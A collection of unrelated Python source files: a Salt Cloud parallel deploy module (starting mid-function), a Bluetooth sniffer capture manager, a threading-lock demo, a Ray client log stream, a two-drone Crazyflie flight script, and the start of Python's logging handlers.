self.opts.get("show_deploy_args", False) is False
and "deploy_kwargs" in output
and isinstance(output[name], dict)
):
output[name].pop("deploy_kwargs", None)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
output[name] = {"Error": str(exc)}
for name in dmap.get("destroy", ()):
output[name] = self.destroy(name)
if self.opts["parallel"] and parallel_data:
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Cloud pool size: %s", pool_size)
output_multip = enter_mainloop(
_create_multiprocessing, parallel_data, pool_size=pool_size
)
# We have deployed in parallel, now do start action in
# correct order based on dependencies.
if self.opts["start_action"]:
actionlist = []
grp = -1
for key, val in groupby(
six.itervalues(dmap["create"]), lambda x: x["level"]
):
actionlist.append([])
grp += 1
for item in val:
actionlist[grp].append(item["name"])
out = {}
for group in actionlist:
log.info(
"Running %s on %s", self.opts["start_action"], ", ".join(group)
)
client = salt.client.get_local_client()
out.update(
client.cmd(
",".join(group),
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
tgt_type="list",
)
)
for obj in output_multip:
next(six.itervalues(obj))["ret"] = out[next(six.iterkeys(obj))]
output.update(obj)
else:
for obj in output_multip:
output.update(obj)
return output
def init_pool_worker():
"""
Make every worker ignore KeyboarInterrup's since it will be handled by the
parent process.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def create_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the create is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
cloud = Cloud(parallel_data["opts"])
try:
output = cloud.create(
parallel_data["profile"], local_master=parallel_data["local_master"]
)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
if parallel_data["opts"].get("show_deploy_args", False) is False and isinstance(
output, dict
):
output.pop("deploy_kwargs", None)
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def destroy_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the destroy is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
clouds = salt.loader.clouds(parallel_data["opts"])
try:
fun = clouds["{0}.destroy".format(parallel_data["driver"])]
with salt.utils.context.func_globals_inject(
fun,
__active_provider_name__=":".join(
[parallel_data["alias"], parallel_data["driver"]]
),
):
output = fun(parallel_data["name"])
except SaltCloudException as exc:
log.error(
"Failed to destroy %s. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def run_parallel_map_providers_query(data, queue=None):
"""
This function will be called from another process when building the
providers map.
"""
salt.utils.crypt.reinit_crypto()
cloud = Cloud(data["opts"])
try:
with salt.utils.context.func_globals_inject(
cloud.clouds[data["fun"]],
__active_provider_name__=":".join([data["alias"], data["driver"]]),
):
return (
data["alias"],
data["driver"],
salt.utils.data.simple_types_filter(cloud.clouds[data["fun"]]()),
)
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for running nodes: %s",
data["fun"],
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any nodes
return data["alias"], data["driver"], ()
# for pickle and multiprocessing, we can't use directly decorators
def _run_parallel_map_providers_query(*args, **kw):
return communicator(run_parallel_map_providers_query)(*args[0], **kw)
def _destroy_multiprocessing(*args, **kw):
return communicator(destroy_multiprocessing)(*args[0], **kw)
def _create_multiprocessing(*args, **kw):
return communicator(create_multiprocessing)(*args[0], **kw)
|
capture_manager.py
|
"""Capture manager for sniffer device."""
from bisect import bisect
import json
import os
import time
from threading import Thread
# Some default values, specific to Ellisys BXE400 in 2011 lab.
# TODO(liuta): create config log for these parameters.
DEFAULT_CAP_DIR = r'C:\Users\tao\bxe400_traces' # Also a FTP base dir
DEFAULT_SPLIT_INTERVAL = 120 # split trace every 2 minutes.
DEFAULT_FTP_LINK = r'ftp://100.96.38.40/'
DEFAULT_CAPTURE_THREAD_CHECK_INTERVAL = 0.1 # Check for new task interval
DEFAULT_HUMAN_READABLE_TIME_FORMAT = '%y-%m-%d %H:%M:%S'
DEFAULT_TASK_SAVE_PATH = (
r'C:\Users\tao\Documents\GitHub\SnifferWebInterface\capture_tasks.json')
def get_capture_filename_by_timestamp(start_time, stop_time):
"""Generate capture filename based on the specified timestamp."""
filename = 'cap-%s-%s.btt' % (
time.strftime('%y%m%d_%H%M%S', time.localtime(start_time)),
time.strftime('%y%m%d_%H%M%S', time.localtime(stop_time)))
return filename
class CaptureTask(object):
"""Data class for capture tasks."""
def __init__(self, task_id, owner, host):
self._task_id = task_id # str, the id of this task
self._start_timestamp = None # Float, epoch time
self._stop_timestamp = None # Float, epoch time
self._owner = owner # str, the owner of this task
self._host = host # str, from which host the task come
self._trace_list = [] # str list, the capture traces of this task.
self._trace_pending = False # bool, True if capture is pending.
def start(self):
self._start_timestamp = time.time()
self._trace_pending = True
def stop(self):
self._stop_timestamp = time.time()
def is_started(self):
return self._start_timestamp is not None
def is_stopped(self):
return self._stop_timestamp is not None
def is_trace_pending(self):
return self._trace_pending
def add_trace(self, trace_path, more_trace=True):
self._trace_list.append(trace_path)
self._trace_pending = more_trace
def to_dict(self, time_format_string=DEFAULT_HUMAN_READABLE_TIME_FORMAT):
"""Convert task to dict for easy serialization."""
res = {}
res['id'] = self._task_id
if self._start_timestamp:
res['start_time'] = time.strftime(
time_format_string, time.localtime(self._start_timestamp))
else:
res['start_time'] = ''
if self._stop_timestamp:
res['stop_time'] = time.strftime(
time_format_string, time.localtime(self._stop_timestamp))
else:
res['stop_time'] = ''
res['owner'] = self._owner
res['host'] = self._host
tmp = []
for p in self._trace_list:
tmp.append(p if DEFAULT_FTP_LINK in p else DEFAULT_FTP_LINK + p)
res['trace_list'] = tmp
res['status'] = self.status
return res
@classmethod
def from_dict(cls, task_dict,
time_format_string=DEFAULT_HUMAN_READABLE_TIME_FORMAT):
"""Convert a dict to task."""
try:
task_id = task_dict['id']
owner = task_dict['owner']
host = task_dict['host']
# Read the string to epoch time.
start_timestamp = time.mktime(
time.strptime(task_dict['start_time'], time_format_string))
stop_timestamp = time.mktime(
time.strptime(task_dict['stop_time'], time_format_string))
if isinstance(task_dict['trace_list'], list):
trace_list = task_dict['trace_list']
else:
raise CaptureTaskException('Invalid trace list.')
pending = False
if task_dict['status'] in ['Running', 'Pending']:
pending = True
task = CaptureTask(task_id, owner, host)
task._start_timestamp = start_timestamp
task._stop_timestamp = stop_timestamp
task._trace_list = trace_list
task._trace_pending = pending
return task
except KeyError as ex:
msg = 'Failed to load task from dict, missing %s' % ex
raise CaptureTaskException(msg)
except ValueError as ex:
msg = 'Failed to parse time: %s.' % ex
raise CaptureTaskException(msg)
@property
def status(self):
"""Returns task status as str.
There are 5 possible status:
- Not started: no start time set
- Running: started and not stopped.
- Pending: stopped, waiting for last capture to finish.
- Finished: stopped and all capture is done.
"""
if self._start_timestamp is None:
st = 'Not Started'
elif self._stop_timestamp is None:
st = 'Running'
elif self._trace_pending:
st = 'Pending'
else:
st = 'Finished'
return st
@property
def start_time(self):
return self._start_timestamp
@property
def stop_time(self):
return self._stop_timestamp
@property
def owner(self):
return self._owner
@property
def host(self):
return self._host
@property
def id(self):
return self._task_id
@property
def trace_list(self):
return self._trace_list
class CaptureManager(object):
"""Main class for capture manager."""
def __init__(self, controller,
capture_dir=DEFAULT_CAP_DIR,
split_interval=DEFAULT_SPLIT_INTERVAL):
"""Create the manager object and start the capture thread.
Args:
controller: (BaseSniffer) Sniffer controller.
capture_dir: (string) The capture directory
split_interval: (float) the time interval before each split
"""
self._controller = controller
self._is_capturing = False
self._shutdown = False
self._capture_dir = capture_dir
self._split_interval = split_interval # for temporary override
self._running_tasks = [] # running capture task list
self._pending_tasks = [] # stopped tasks waiting for last capture to finish
self._finished_tasks = [] # finished capture task list
self._task_id_map = {} # A dict of task id -> task for task lookup.
# Sorted list of captured trace's (start epoch time, filename).
self._trace_file_list = []
# Start the capture thread
self._capture_thread = Thread(target=self._capture_thread_func)
self._capture_thread.daemon = True # thread dies with the program
self._capture_thread.start()
self._capture_start_time = 0
# Load previous captures
self._load_tasks_from_disk()
def _capture_thread_func(self):
"""Thread function for capture management."""
print('Capture thread started.')
while not self._shutdown:
# Running state change
if self._has_running_tasks():
# state change: idle -> capture
if not self._is_capturing:
if self._controller.start_capture():
self._is_capturing = True
self._capture_start_time = time.time()
print(time.strftime('CaptureThread: start capture @ %x %X.'))
else:
print('Capture thread: failed to start capture (%s).' %
self._controller.model)
# split trace based on interval
if self._should_split():
self._split_capture()
print(time.strftime('CaptureThread: split capture @ %x %X.'))
else:
# No running task, stop capture is necessary.
if self._is_capturing:
# state change: capture -> idle
self._stop_capture()
print(time.strftime('CaptureThread: stop capture @ %x %X.'))
time.sleep(DEFAULT_CAPTURE_THREAD_CHECK_INTERVAL)
# Capture thread will shutdown. Stop capture and close the controller.
if self._is_capturing:
# state change: capture -> shutdown
self._stop_capture()
time.strftime('CaptureThread: shutdown capture @ %x %X.')
print('Capture thread shutdown.')
def _stop_capture(self):
"""Stop the capture with necessary bookkeeping."""
trace_path = get_capture_filename_by_timestamp(
self._capture_start_time, time.time())
real_path = os.path.join(DEFAULT_CAP_DIR, trace_path)
print('CaptureManager: stopping capture, trace path %s' % real_path)
self._controller.stop_capture(real_path)
trace_stop_time = time.time()
trace_start_time = self._capture_start_time
self._trace_file_list.append((trace_start_time,
trace_stop_time,
trace_path))
self._previous_start_time = 0
self._is_capturing = False
self._add_trace_to_tasks(trace_path)
def _split_capture(self):
"""Split capture."""
trace_path = get_capture_filename_by_timestamp(
self._capture_start_time, time.time())
real_path = os.path.join(DEFAULT_CAP_DIR, trace_path)
print('CaptureManager: spliting capture, trace path %s' % real_path)
self._controller.split_capture(real_path)
trace_start_time = self._capture_start_time
trace_stop_time = time.time()
self._capture_start_time = trace_stop_time
self._trace_file_list.append((trace_start_time,
trace_stop_time,
trace_path))
self._add_trace_to_tasks(trace_path)
def _add_trace_to_tasks(self, trace_path):
"""Add trace to running task and move finished task to the finished list."""
finished_idx = []
idx = 0
for task in self._running_tasks:
task.add_trace(trace_path)
# Reverse the list so they are in time order.
for task in reversed(self._pending_tasks):
task.add_trace(trace_path, more_trace=False)
print('CaptureManager: Task finished, ID %s' % task.id)
self._finished_tasks.append(task)
self._pending_tasks = []
def _should_split(self):
"""Determine if we should split the file."""
if self._split_interval > 0 and self._capture_start_time > 0:
if time.time() - self._capture_start_time >= self._split_interval:
return True
return False
def _has_running_tasks(self):
return bool(self._running_tasks)
def _find_trace_list_by_timestamps(self, start_time, stop_time):
"""Find the list of traces within the start/stop time period."""
result = []
# Find the first trace with start_time > task_start_time.
idx = bisect(self._trace_file_list, (start_time, 0.0, ''))
start_idx = idx - 1 if idx > 0 else 0
# Then iterate from the start to end, add all traces within specified time.
for trace_start_time, trace_stop_time, trace_path in \
self._trace_file_list[start_idx:]:
if trace_stop_time <= start_time:
continue
elif trace_start_time >= stop_time:
break
else:
result.append(trace_path)
return result
def start_new_task(self, task_id, task_owner, task_host):
"""Start a new capture task."""
# Every new task must has unique ID.
if self.get_task_by_id(task_id):
raise DuplicateTaskError('Duplicate task ID %s' % task_id)
task = CaptureTask(task_id, task_owner, task_host)
self._running_tasks.append(task)
self._task_id_map[task_id] = task
task.start()
print('CaptureManager: Start task, ID %s' % task_id)
def stop_task(self, task_id):
"""Stop the task with specified task id."""
task = self.get_task_by_id(task_id)
if task is None:
raise TaskNotFoundError('Cannot find task with ID %s' % task_id)
if task.is_stopped():
raise TaskStoppedError('Task already stopped.')
# Stopped task will be moved to pending list. Task in pending list will be
# moved to finished on the next capture split/stop.
task.stop()
try:
self._running_tasks.remove(task)
except ValueError:
raise TaskNotFoundError('Cannot find task in queue. ID %s' % task_id)
self._pending_tasks.append(task)
print('CaptureManager: Stop task (wait for last capture), ID %s' % task_id)
def get_finished_tasks(self):
return self._finished_tasks
def get_running_tasks(self):
return self._running_tasks
def get_pending_tasks(self):
return self._pending_tasks
def get_task_by_id(self, task_id):
return self._task_id_map.get(task_id, None)
def shutdown(self):
"""Shutdown the capture thread."""
for task in self._running_tasks:
task.stop()
self._shutdown = True
self._capture_thread.join()
self._controller.close()
self._save_tasks_to_disk()
def get_controller_model(self):
return self._controller.model
def get_capture_config(self):
"""Get capture config as dict."""
# Capture config is controller's config + split setting.
# TODO(liuta): should be converted to a generic config method.
config = {'Capture Split Interval': '%s seconds' % self._split_interval}
config.update(self._controller.get_capture_config())
return config
def _save_tasks_to_disk(self):
"""Save the tasks to persistent storage."""
# TODO(liuta): need to use cloud storage for better capture storage.
res = []
for task in self._finished_tasks:
res.append(task.to_dict())
try:
with open(DEFAULT_TASK_SAVE_PATH, 'wb') as f:
json.dump(res, f, indent=1)
print('%d tasks saved to %s.' % (len(res), DEFAULT_TASK_SAVE_PATH))
except IOError as ex:
print('Failed to save task: %s' % ex)
def _load_tasks_from_disk(self):
"""Load the task from disk."""
res = []
try:
with open(DEFAULT_TASK_SAVE_PATH, 'rb') as f:
res = json.load(f)
except IOError:
print 'No saved task, starting fresh.'
for t in res:
task = CaptureTask.from_dict(t)
self._finished_tasks.append(task)
self._task_id_map[task.id] = task
class CaptureTaskException(Exception):
pass
class DuplicateTaskError(CaptureTaskException):
pass
class TaskNotFoundError(CaptureTaskException):
pass
class TaskStoppedError(CaptureTaskException):
pass
|
MyTheradClass_lock2.py
|
import threading
import time
konci2 = threading.Lock()
#lock = digunakan untuk block sebuah thread untuk melakukan execute sebelum thread lain beres
#lock2 = posisi dari method release() yang diubah akan mempengaruhi output
def orang_pertama(konci2):
konci2.acquire()
print('orang - 1 sedang menggunakan kamar mandi')
time.sleep(1)
print('orang - 1 sudah selesai')
# konci2.release()
def orang_kedua(konci2):
# konci2.acquire()
print('orang - 2 sedang menggunakan kamar mandi')
konci2.release()
time.sleep(1)
print('orang - 2 sudah selesai')
t1 = threading.Thread(target=orang_pertama, args=(konci2, ))
t2 = threading.Thread(target=orang_kedua, args=(konci2, ))
t1.start()
t2.start()
t1.join()
t2.join()
|
logsclient.py
|
"""This file implements a threaded stream controller to return logs back from
the ray clientserver.
"""
import sys
import logging
import queue
import threading
import grpc
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
logger = logging.getLogger(__name__)
# TODO(barakmich): Running a logger in a logger causes loopback.
# The client logger need its own root -- possibly this one.
# For the moment, let's just not propogate beyond this point.
logger.propagate = False
class LogstreamClient:
def __init__(self, channel: "grpc._channel.Channel"):
"""Initializes a thread-safe log stream over a Ray Client gRPC channel.
Args:
channel: connected gRPC channel
"""
self.channel = channel
self.request_queue = queue.Queue()
self.log_thread = self._start_logthread()
self.log_thread.start()
def _start_logthread(self) -> threading.Thread:
return threading.Thread(target=self._log_main, args=(), daemon=True)
def _log_main(self) -> None:
stub = ray_client_pb2_grpc.RayletLogStreamerStub(self.channel)
log_stream = stub.Logstream(iter(self.request_queue.get, None))
try:
for record in log_stream:
if record.level < 0:
self.stdstream(level=record.level, msg=record.msg)
self.log(level=record.level, msg=record.msg)
except grpc.RpcError as e:
if grpc.StatusCode.CANCELLED != e.code():
# Not just shutting down normally
logger.error(
f"Got Error from logger channel -- shutting down: {e}")
raise e
def log(self, level: int, msg: str):
"""Log the message from the log stream.
By default, calls logger.log but this can be overridden.
Args:
level: The loglevel of the received log message
msg: The content of the message
"""
logger.log(level=level, msg=msg)
def stdstream(self, level: int, msg: str):
"""Log the stdout/stderr entry from the log stream.
By default, calls print but this can be overridden.
Args:
level: The loglevel of the received log message
msg: The content of the message
"""
print_file = sys.stderr if level == -2 else sys.stdout
print(msg, file=print_file)
def set_logstream_level(self, level: int):
logger.setLevel(level)
req = ray_client_pb2.LogSettingsRequest()
req.enabled = True
req.loglevel = level
self.request_queue.put(req)
def close(self) -> None:
self.request_queue.put(None)
if self.log_thread is not None:
self.log_thread.join()
def disable_logs(self) -> None:
req = ray_client_pb2.LogSettingsRequest()
req.enabled = False
self.request_queue.put(req)
|
circDemo.py
|
#!/usr/bin/env python
#Drone 1: Forward/backward; (0,-0.6,0.4) <-> (0,0.6,0.4)
#Drone 2: Circle, center(0,0,0.4) radius(0.6).
#Drone 2 stops + hovers when Drone 1 is near endpoints, (within 0.2?)
#D2: PLACE AT x=+r. THEN GOES TO y=+r
#D1: PLACE AT y=-r, THEN GOES TO y=+r
import rospy
import tf
from crazyflie_driver.msg import Position
from crazyflie_driver.msg import Hover
from crazyflie_driver.msg import GenericLogData
from std_msgs.msg import Empty
from crazyflie_driver.srv import UpdateParams
from threading import Thread
import math
cf2stop = False
cf1nextInteresect = []
cf1pos = [0,0,0,0]
cf2pos = [0,0,0,0]
cf1setpoint = [0,0,0,0]
maxERR = 1000
def callback_cf1pos(data):
global cf1pos
cf1pos[0] = data.values[0]
cf1pos[1] = data.values[1]
cf1pos[2] = data.values[2]
def callback_cf2pos(data):
global cf2pos
cf2pos[0] = data.values[0]
cf2pos[1] = data.values[1]
cf2pos[2] = data.values[2]
class Crazyflie:
def __init__(self, prefix):
self.prefix = prefix
worldFrame = rospy.get_param("~worldFrame", "/world")
self.rate = rospy.Rate(5)
rospy.wait_for_service(prefix + '/update_params')
rospy.loginfo("found update_params service")
self.update_params = rospy.ServiceProxy(prefix + '/update_params', UpdateParams)
self.setParam("kalman/resetEstimation", 1)
self.setParam("flightmode/posSet", 1)
self.pub = rospy.Publisher(prefix + "/cmd_setpoint", Position, queue_size=1)
self.msg = Position()
self.msg.header.seq = 0
self.msg.header.stamp = rospy.Time.now()
self.msg.header.frame_id = worldFrame
self.msg.x = 0
self.msg.y = 0
self.msg.z = 0
self.msg.yaw = 0
self.stop_pub = rospy.Publisher(prefix + "/cmd_stop", Empty, queue_size=1)
self.stop_msg = Empty()
def setParam(self, name, value):
rospy.set_param(self.prefix + "/" + name, value)
self.update_params([name])
def goToSetpoint(self, setpoint):
self.msg.x = setpoint[0]
self.msg.y = setpoint[1]
self.msg.z = setpoint[2]
self.msg.yaw = setpoint[3]
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
def dist(v1, v2):
return abs( (v1[0] - v2[0])**2 + (v1[1]-v2[1])**2 )**(0.5)
def ylineNext(height, r, step, steps):
x = 0
direct = 1
#step = 0 is intersect1, y=-r
#step = steps/2 is intersect2, y=+r
if step > steps/2:
direct = -1
step -= steps/2
y = -r+r*4*step/steps
y = y*direct
return [x, y, height, 0]
def getDirect(step, steps):
direct = 1
if step > steps/2:
direct = -1
return direct
def circNext(height, r, step, steps):
angle = 2*math.pi*step/steps
x = r*math.cos(angle)
y = r*math.sin(angle)
yaw = angle
return [x, y, height, yaw]
def getError(actual, theoretical):
Err = [0,0,0,0]
for i in range(len(Err)):
Err[i] = actual[i] - theoretical[i]
Err[i] = int(Err[i]*1000)/1000.0
return (Err)
def getErrCircle(actual, theoretical):
guessPos = [0,0,0,0]
err = getError(actual, theoretical)
r = dist(err, [0,0,0,0])*2.0/3
for i in range(len(guessPos)):
guessPos[i] = (theoretical[i] + actual[i])/2
return [guessPos, r]
def distErr(errCircleA, errCircleB):
d = dist(errCircleA[0], errCircleB[0])
d = d - errCircleA[1] - errCircleB[1]
return max(0, d)
def cf2task(cf):
global cf2stop, cf1nextInteresect, cf2pos, cf1pos, maxERR, cf1setpoint
rate = rospy.Rate(5)
#TEST POS
cf2pos = [0,0,0,0]
cf2setpoint = []
#start setpoint, go to 0,6, 0, 0.6
cf2setpoint = [0.6, 0, 0.4, 0]
cf2nextIntersect = [0, 0.6, 0.4, 0]
#Take off
#cf.goToSetpoint([0, 0, 0.4, 0])
radius = 0.6
currentStep = 0
divisions = 30
stay = False
ErrCirc2 = getErrCircle(cf2pos, cf2setpoint)
#FOR TESTING PURPOSES:
#CIRCLE STARTS AT x =+, THEN GOES TO y =+
for i in range(3000):
#print("internal/goal" + str(cf1pos) + "/[0,0,0,0]")
print ("Sleeping T2 (drone)")
rate.sleep()
for i in range(20):
cf2setpoint = circNext(cf2setpoint[2], radius, currentStep, divisions)
cf.goToSetpoint(cf2setpoint)
rate.sleep()
while(True):
ErrCirc2 = getErrCircle(cf2pos, cf2setpoint)
if cf2nextIntersect[1] > 0:
print("circle going to y++")
else:
print("circle going to y--")
error = dist(getError(cf2pos, cf2setpoint), [0,0,0,0])
print("**c2 error " + str(error) + " r= " + str(ErrCirc2[1]))
stay = False
#get nextIntersect, but skew it so if it is too close it will keep on moving
cf2nextIntersect[1] = -1*radius if divisions/4 < currentStep+divisions/20 < 3*divisions/4 else radius
if cf2stop and cf2nextIntersect[1] == cf1nextInteresect[1]:
d = distErr(ErrCirc2, [cf1nextInteresect, 0])
if (d < 0.1):
stay = True
d = dist(cf2pos, cf1pos)
print("distance between drones: " + str(d))
if d < 0.05:
print("CRASH PREVENTION")
cf2setpoint[2] = 0
if error > maxERR:
print("error is bad, circle will stay")
stay = True
if (stay):
cf.goToSetpoint(cf2setpoint) #stay at position
else:
cf2setpoint = circNext(cf2setpoint[2], radius, currentStep, divisions)
currentStep = (currentStep + 1 ) % divisions
cf.goToSetpoint(cf2setpoint)
#CIRCLE
rate.sleep()
return
def cf1task(cf):
global cf2stop, cf1nextInteresect, cf1pos, maxERR, cf1setpoint
rate = rospy.Rate(5)
cf1pos = [0,0,0,0]
#1=>going toward y=0.6, -1=>going toward y=-0.6
direction = 1
radius = 0.6
divisions = 80
currentStep = 0
cf1nextInteresect = [0,0.6,0.4,0]
stay = False
cf1setpoint = ylineNext(cf1nextInteresect[2], radius, currentStep, divisions)
ErrCirc1 = getErrCircle(cf1setpoint, cf1pos)
#FOR TESTING PURPOSES:
'''for i in range(3000):
#print("internal/goal" + str(cf1pos) + "/[0,0,0,0]")
print ("Sleeping T1 (drone)")
rate.sleep()'''
#take off
for i in range(20):
#print("internal/goal" + str(cf1pos) + "/[0,0,0.4,0]")
print(cf1pos)
rate.sleep()
for i in range(4000):
#print("internal/goal" + str(cf1pos) + "/[0,0,0.4,0]")
print(cf1pos)
currentStep = (currentStep + 1) % divisions
cf.goToSetpoint(cf1setpoint)
if (i % (divisions/4) == 0):
print("Dropping")
for k in range(30):
cf.goToSetpoint(cf1setpoint)
rate.sleep()
rate.sleep()
rate.sleep()
while(True):
ErrCirc1 = getErrCircle(cf1setpoint, cf1pos)
error = dist(getError(cf1pos, cf1setpoint), [0,0,0,0])
print("*c1 error " + str(error) + " r= " + str(ErrCirc1[1]))
stay = False
if (error > maxERR):
print("Error bad. line will stay")
stay = True
#print("internal/goal" + str(cf1pos) + "/" + str(cf1setpoint))
cf1setpoint = ylineNext(cf1nextInteresect[2], radius, currentStep, divisions)
direction = getDirect(currentStep, divisions)
if not stay:
currentStep = (currentStep + 1) % divisions
cf.goToSetpoint(cf1setpoint)
cf1nextInteresect[1] = direction*radius
if (direction == 1):
print("Line going to y+++")
else:
print("Line going to y---")
#find out internal position, set cf1pos
if ( distErr(ErrCirc1, [cf1nextInteresect, 0]) < 0.1):
cf2stop = True
print("cf2stop warn")
elif cf2stop:
cf1oldIntersect = cf1nextInteresect
cf1oldIntersect[1] *= -1
if distErr(ErrCirc1, [cf1nextInteresect, 0]) > 0.1:
cf2stop = False
rate.sleep()
return
def cf1taskFake(cf):
global cf2stop, cf1nextInteresect, cf1pos, maxERR, cf1setpoint
rate = rospy.Rate(5)
cf1pos = [0,0,0,0]
#1=>going toward y=0.6, -1=>going toward y=-0.6
direction = 1
radius = 0.6
divisions = 80
currentStep = 0
cf1nextInteresect = [0,0.6,0.4,0]
stay = False
cf1setpoint = ylineNext(cf1nextInteresect[2], radius, currentStep, divisions)
ErrCirc1 = getErrCircle(cf1setpoint, cf1setpoint)
#FOR TESTING PURPOSES:
for i in range(30):
#print("internal/goal" + str(cf1pos) + "/[0,0,0,0]")
print ("Sleeping T1 (drone)")
rate.sleep()
#take off
while(True):
ErrCirc1 = getErrCircle(cf1setpoint, cf1setpoint)
error = dist(getError(cf1setpoint, cf1setpoint), [0,0,0,0])
print("*c1 error " + str(error) + " r= " + str(ErrCirc1[1]))
stay = False
if (error > maxERR):
print("Error bad. line will stay")
stay = True
#print("internal/goal" + str(cf1pos) + "/" + str(cf1setpoint))
cf1setpoint = ylineNext(cf1nextInteresect[2], radius, currentStep, divisions)
direction = getDirect(currentStep, divisions)
if not stay:
currentStep = (currentStep + 1) % divisions
#cf.goToSetpoint(cf1setpoint)
cf1nextInteresect[1] = direction*radius
if (direction == 1):
print("Line going to y+++")
else:
print("Line going to y---")
#find out internal position, set cf1pos
if ( distErr(ErrCirc1, [cf1nextInteresect, 0]) < 0.1):
cf2stop = True
print("cf2stop warn")
elif cf2stop:
cf1oldIntersect = cf1nextInteresect
cf1oldIntersect[1] *= -1
if distErr(ErrCirc1, [cf1nextInteresect, 0]) > 0.1:
cf2stop = False
print("cf2 can go ")
rate.sleep()
return
def cf2taskFake(cf):
global cf2stop, cf1nextInteresect, cf2pos, cf1pos, maxERR, cf1setpoint
rate = rospy.Rate(5)
#TEST POS
cf2pos = [0,0,0,0]
cf2setpoint = []
#start setpoint, go to 0,6, 0, 0.6
cf2setpoint = [0.6, 0, 0.4, 0]
cf2nextIntersect = [0, 0.6, 0.4, 0]
#Take off
#cf.goToSetpoint([0, 0, 0.4, 0])
radius = 0.6
currentStep = 0
divisions = 30
stay = False
ErrCirc2 = getErrCircle(cf2setpoint, cf2setpoint)
#FOR TESTING PURPOSES:
#CIRCLE STARTS AT x =+, THEN GOES TO y =+
for i in range(20):
print("Sleeping t2")
rate.sleep()
while(True):
ErrCirc2 = getErrCircle(cf2setpoint, cf2setpoint)
if cf2nextIntersect[1] > 0:
print("circle going to y++")
else:
print("circle going to y--")
error = dist(getError(cf2setpoint, cf2setpoint), [0,0,0,0])
stay = False
#get nextIntersect, but skew it so if it is too close it will keep on moving
cf2nextIntersect[1] = -1*radius if divisions/4 < currentStep+divisions/20 < 3*divisions/4 else radius
if cf2stop and cf2nextIntersect[1] == cf1nextInteresect[1]:
d = distErr(ErrCirc2, [cf1nextInteresect, 0])
if (d < 0.1):
stay = True
d = dist(cf2setpoint, cf1setpoint)
print("distance between drones: " + str(d))
if d < 0.05:
print("CRASH PREVENTION")
cf2setpoint[2] = 0
if error > maxERR:
print("error is bad, circle will stay")
stay = True
if (stay):
cf.goToSetpoint(cf2setpoint) #stay at position
else:
cf2setpoint = circNext(cf2setpoint[2], radius, currentStep, divisions)
currentStep = (currentStep + 1 ) % divisions
cf.goToSetpoint(cf2setpoint)
#CIRCLE
rate.sleep()
return
if __name__ == '__main__':
rospy.init_node('position', anonymous=True)
cf1 = Crazyflie("cf1")
cf2 = Crazyflie("cf2")
rospy.Subscriber("cf1/log1", GenericLogData, callback_cf1pos)
rospy.Subscriber("cf2/log2", GenericLogData, callback_cf2pos)
print("STARTING THREADS")
#t1 = Thread(target=cf1task, args=(cf1,))
#t2 = Thread(target=cf2task, args=(cf2,))
t1 = Thread(target=cf1taskFake, args=(cf1,))
t2 = Thread(target=cf2taskFake, args=(cf2,))
t1.start()
t2.start()
t1.join()
t2.join()
|
handlers.py
|
# Copyright 2001-2010 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python, and influenced by
Apache's log4j system.
Copyright (C) 2001-2010 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
try:
import codecs
except ImportError:
codecs = None
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=0):
"""
Use the specified filename for streamed logging
"""
if codecs is None:
encoding = None
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
